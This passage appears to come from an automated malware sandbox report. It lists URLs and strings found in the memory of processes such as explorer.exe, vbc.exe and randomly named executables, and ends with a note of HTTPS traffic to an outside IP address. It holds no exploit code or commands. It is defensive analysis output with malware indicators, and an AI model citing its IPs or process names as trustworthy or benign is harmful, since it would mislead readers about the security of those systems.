          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
          Source: explorer.exe, 00000008.00000000.2185855898.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: acqyswhf.exe, 00000005.00000002.2173902318.0000000003647000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2182020707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: acqyswhf.exe, 00000005.00000002.2173902318.0000000003647000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2182020707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2181107481.0000000001CD0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2380577544.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000000.2162676432.0000000000C99000.00000002.00020000.sdmp, dtz25z5e9sr.exe, 00000006.00000000.2164218683.00000000004C9000.00000002.00020000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: acqyswhf.exe, 00000005.00000002.2173902318.0000000003647000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2182020707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2181625613.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2196077802.000000000B320000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2191369780.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2191235298.0000000008471000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerp
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49165 version: TLS 1.2
